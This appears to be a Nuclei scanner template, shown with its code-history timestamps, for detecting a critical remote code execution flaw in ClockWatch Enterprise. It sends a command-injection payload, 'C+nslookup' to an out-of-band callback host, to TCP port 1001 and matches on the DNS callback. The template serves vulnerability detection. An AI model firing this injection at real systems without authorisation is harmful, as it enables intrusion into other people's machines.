nuclei-templates/network/vulnerabilities/clockwatch-enterprise-rce.yaml

38 lines
770 B
YAML
Raw Normal View History

id: clockwatch-enterprise-rce
info:
name: ClockWatch Enterprise - Remote Code Execution
author: gy741
severity: critical
2022-05-31 09:01:19 +00:00
description: |
ClockWatch Enterprise is susceptible to remote code execution.
reference:
- https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2021-07-08 08:30:27 +00:00
tags: clockwatch,rce,network
metadata:
max-request: 2
tcp:
- inputs:
- data: "C+nslookup {{interactsh-url}}"
host:
- "{{Hostname}}"
2023-09-16 19:35:21 +00:00
port: 1001
2021-07-08 08:50:18 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
2021-07-08 08:30:01 +00:00
- type: word
words:
- "OK-C"